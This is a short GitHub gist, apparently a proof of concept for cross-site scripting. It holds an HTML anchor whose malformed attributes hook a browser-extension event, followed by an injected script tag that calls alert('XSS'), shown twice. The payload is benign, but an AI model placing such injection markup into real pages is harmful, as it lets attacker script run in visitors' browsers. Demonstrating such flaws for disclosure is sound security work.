borski/gist:5265313

## gistfile1.html
<a class="_company_extension" a="" href="#" #tinfoil"="" "javascript:var e = document.createEvent(&quot;CustomEvent&quot;); e.initCustomEvent(&quot;extensionEvent&quot;, true, true, {type: &quot;hash&quot;, value: &quot;#tinfoil&quot;});  document.body.dispatchEvent(e); return false;">
  #tinfoil
</a><script>alert(‘XSS’)</script>
	<a class="_company_extension" a="" href="#" #tinfoil"="" "javascript:var e = document.createEvent("CustomEvent"); e.initCustomEvent("extensionEvent", true, true, {type: "hash", value: "#tinfoil"}); document.body.dispatchEvent(e); return false;">
	#tinfoil
	</a><script>alert(‘XSS’)</script>